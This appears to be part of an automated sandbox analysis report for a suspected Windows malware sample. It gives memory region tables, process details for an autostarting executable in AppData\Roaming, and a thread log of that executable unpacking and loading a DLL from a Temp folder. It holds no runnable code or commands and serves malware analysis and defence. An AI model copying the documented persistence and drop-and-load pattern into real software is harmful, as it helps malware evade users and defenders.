pagefile_0x0000000000c00000	0x00c00000	0x00c00fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000c10000	0x00c10000	0x00c11fff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00c20000	0x00cddfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000ce0000	0x00ce0000	0x00d1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000d20000	0x00d20000	0x00d5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000d60000	0x00d60000	0x00d60fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000d70000	0x00d70000	0x00d7ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000d80000	0x00d80000	0x00dbffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000dc0000	0x00dc0000	0x00dfffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000e00000	0x00e00000	0x00e00fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000e10000	0x00e10000	0x00e13fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000e20000	0x00e20000	0x00e20fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000e30000	0x00e30000	0x00e30fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000e40000	0x00e40000	0x00e7ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000e80000	0x00e80000	0x00f7ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000f80000	0x00f80000	0x01107fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001140000	0x01140000	0x0114ffff	Private Memory	Readable, Writable	Region Actions Download Dump
kernelbase.dll.mui	0x01150000	0x0122efff	Memory Mapped File	Readable	Region Actions
private_0x0000000001230000	0x01230000	0x0126ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001270000	0x01270000	0x012affff	Private Memory	Readable, Writable	Region Actions Download Dump
taskkill.exe	0x012d0000	0x012e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000012f0000	0x012f0000	0x052effff	Pagefile Backed Memory	-	Region Actions
pagefile_0x00000000052f0000	0x052f0000	0x05470fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000005480000	0x05480000	0x0687ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x06880000	0x06bb6fff	Memory Mapped File	Readable	Region Actions
private_0x0000000006bc0000	0x06bc0000	0x06bfffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006c00000	0x06c00000	0x06c3ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006c40000	0x06c40000	0x06c7ffff	Private Memory	Readable, Writable	Region Actions Download Dump
wow64cpu.dll	0x5c9f0000	0x5c9f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x5ca00000	0x5ca72fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x5ca80000	0x5cacefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wmiutils.dll	0x72ff0000	0x7300dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
fastprox.dll	0x73010000	0x730cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wbemsvc.dll	0x730d0000	0x730e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winsta.dll	0x730f0000	0x73133fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wbemcomn.dll	0x73140000	0x731a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wbemprox.dll	0x731b0000	0x731bcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netutils.dll	0x731c0000	0x731c9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x73200000	0x7322efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x73230000	0x73242fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x73250000	0x7326bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dbghelp.dll	0x73270000	0x733aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
framedynos.dll	0x733b0000	0x733eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpr.dll	0x733f0000	0x73406fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcrypt.dll	0x736e0000	0x736fafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x73d50000	0x73d57fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcryptprimitives.dll	0x74230000	0x74288fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74290000	0x74299fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x742a0000	0x742bdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x742c0000	0x74341fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x74500000	0x7463ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74730000	0x7475afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75b80000	0x75c3dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x75d40000	0x75dbafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x75dc0000	0x75e03fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75f20000	0x76095fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x760a0000	0x760e2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x763b0000	0x76441fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76470000	0x764cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x769b0000	0x76afcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76bc0000	0x76caffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
combase.dll	0x76cf0000	0x76ea9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel.appcore.dll	0x76eb0000	0x76ebbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77040000	0x77046fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x77070000	0x7718ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77190000	0x77308fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007eae7000	0x7eae7000	0x7eae9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007eaea000	0x7eaea000	0x7eaecfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007eaed000	0x7eaed000	0x7eaeffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000007eaf0000	0x7eaf0000	0x7ebeffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ebf0000	0x7ebf0000	0x7ec12fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ec14000	0x7ec14000	0x7ec14fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ec16000	0x7ec16000	0x7ec18fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ec19000	0x7ec19000	0x7ec1bfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ec1c000	0x7ec1c000	0x7ec1efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ec1f000	0x7ec1f000	0x7ec1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7dfb3d30ffff	Private Memory	Readable	Region Actions
pagefile_0x00007dfb3d310000	0x7dfb3d310000	0x7ffb3d30ffff	Pagefile Backed Memory	-	Region Actions
ntdll.dll	0x7ffb3d310000	0x7ffb3d4d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007ffb3d4d2000	0x7ffb3d4d2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Process #11: vworbzlbc.exe

(Host: 380, Network: 0)

Information	Value
ID	#11
File Name	c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe
Command Line	"C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:49, Reason: Autostart
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:03:34

OS Process Information

Information	Value
PID	0xd40
Parent PID	0x81c (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D44 0x D48 0x D4C 0x D50

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00023fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000060000	0x00060000	0x0009ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000a0000	0x000a0000	0x0019ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001c1fff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x001d0000	0x0028dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000290000	0x00290000	0x0029ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002a0000	0x002a0000	0x002dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002e0000	0x002e0000	0x003dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003e0000	0x003e0000	0x003e0fff	Private Memory	Readable, Writable	Region Actions
oleaccrc.dll	0x003f0000	0x003f1fff	Memory Mapped File	Readable	Region Actions
vworbzlbc.exe	0x00400000	0x0043bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000440000	0x00440000	0x00441fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000450000	0x00450000	0x004bffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000450000	0x00450000	0x00453fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000460000	0x00460000	0x00460fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000470000	0x00470000	0x004affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004b0000	0x004b0000	0x004bffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000004c0000	0x004c0000	0x004c0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000004d0000	0x004d0000	0x004d0fff	Pagefile Backed Memory	Readable	Region Actions
cversions.1.db	0x004e0000	0x004e3fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000004e0000	0x004e0000	0x004e2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000004e0000	0x004e0000	0x004edfff	Private Memory	Readable, Writable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db	0x004f0000	0x00508fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000510000	0x00510000	0x0051ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000520000	0x00520000	0x00520fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000530000	0x00530000	0x00541fff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000550000	0x00550000	0x0055efff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000560000	0x00560000	0x0065ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000660000	0x00660000	0x007e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007f0000	0x007f0000	0x00970fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000980000	0x00980000	0x01d7ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01d80000	0x020b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000020c0000	0x020c0000	0x021bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021c0000	0x021c0000	0x021fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002200000	0x02200000	0x022fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002300000	0x02300000	0x02b07fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b10000	0x02b10000	0x08a73fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008a80000	0x08a80000	0x08bf6fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008c00000	0x08c00000	0x08d78fff	Private Memory	Readable, Writable	Region Actions
system.dll	0x10000000	0x10005fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x73aa0000	0x73acefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcrypt.dll	0x73ad0000	0x73aeafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x73af0000	0x73b02fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x73b10000	0x73b15fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x73b20000	0x73b27fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleacc.dll	0x73b30000	0x73b82fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x73b90000	0x73bacfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x73bb0000	0x73cf1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x73d00000	0x73d90fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x73da0000	0x73db8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73dc0000	0x73e34fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x73e40000	0x74048fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcryptprimitives.dll	0x74050000	0x740a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x740b0000	0x740b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x740c0000	0x740ddfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
powrprof.dll	0x74100000	0x74143fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x74150000	0x741e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shcore.dll	0x74370000	0x743fcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x74410000	0x74491fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74560000	0x745a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x745b0000	0x746cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel.appcore.dll	0x746e0000	0x746ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x749e0000	0x74a8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x74a90000	0x74b79fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x74bd0000	0x74c05fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x74c10000	0x75fcefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
combase.dll	0x76040000	0x761f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
windows.storage.dll	0x76390000	0x7686cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76960000	0x76a9ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76aa0000	0x76acafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x76ad0000	0x76adefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76c00000	0x76c43fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76c50000	0x76ccafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x76cd0000	0x76e74fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76f40000	0x7708cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007fead000	0x7fead000	0x7feaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007feb0000	0x7feb0000	0x7ffaffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd5000	0x7ffd5000	0x7ffd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffd8000	0x7ffd8000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdb000	0x7ffdb000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fff470fffff	Private Memory	Readable	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xd44

(Host: 292, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x74820790	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\UXTHEME.dll, base_address = 0x73dc0000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\USERENV.dll, base_address = 0x73da0000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\SETUPAPI.dll, base_address = 0x76cd0000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\APPHELP.dll, base_address = 0x73d00000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\PROPSYS.dll, base_address = 0x73bb0000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\DWMAPI.dll, base_address = 0x73b90000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\CRYPTBASE.dll, base_address = 0x740b0000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\OLEACC.dll, base_address = 0x73b30000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\CLBCATQ.dll, base_address = 0x74410000	1	Fn
Module	Get Handle	module_name = VERSION, base_address = 0x0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\VERSION.dll, base_address = 0x73b20000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\version.dll, function = GetFileVersionInfoA, address_out = 0x73b21f80	1	Fn
Module	Get Handle	module_name = SHFOLDER, base_address = 0x0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\SHFOLDER.dll, base_address = 0x73b10000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shfolder.dll, function = SHGetFolderPathA, address_out = 0x73b11300	1	Fn
Module	Get Handle	module_name = c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe, base_address = 0x400000	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\	1	Fn
System	Get Time	type = Ticks, time = 35781	1	Fn
File	Create Temp File	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsx8BC5.tmp, path = C:\Users\CIIHMN~1\AppData\Local\Temp\, prefix = nsx	1	Fn
File	Delete	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsx8BC5.tmp	1	Fn
System	Get Time	type = Ticks, time = 35781	1	Fn
Module	Get Filename	module_name = SHFOLDER, process_name = c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 1024	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, type = size	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 512, size_out = 512	79	Fn Data
System	Get Time	type = Ticks, time = 35796	1	Fn
File	Create Temp File	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, path = C:\Users\CIIHMN~1\AppData\Local\Temp\, prefix = nsm	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_TEMPORARY, FILE_FLAG_DELETE_ON_CLOSE	1	Fn
System	Get Time	type = Ticks, time = 35796	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 32768	2	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 14048	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 4, size_out = 4	1	Fn Data
System	Get Time	type = Ticks, time = 35812	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 31488, size_out = 31488	1	Fn Data
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x762ba6f0	1	Fn
File	Create Directory	C:\Users	1	Fn
File	Get Info	filename = C:\Users, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local\Temp	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp, type = file_attributes	1	Fn
System	Get Time	type = Ticks, time = 35828	1	Fn
File	Create Temp File	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp, path = C:\Users\CIIHMN~1\AppData\Local\Temp, prefix = nss	1	Fn
File	Delete	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp	1	Fn
File	Create Directory	C:\Users	1	Fn
File	Get Info	filename = C:\Users, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local\Temp	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp, type = file_attributes	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\shell32.dll, base_address = 0x74c10000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shell32.dll, function = 680, address_out = 0x74eafa00	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
System	Get Time	type = Ticks, time = 35828	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 4, size_out = 4	1	Fn Data
System	Get Time	type = Ticks, time = 35828	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 11264, size_out = 11264	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, size = 11264	1	Fn Data
Module	Get Handle	module_name = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\msvcrt.dll, base_address = 0x744a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x744e78c0	1	Fn
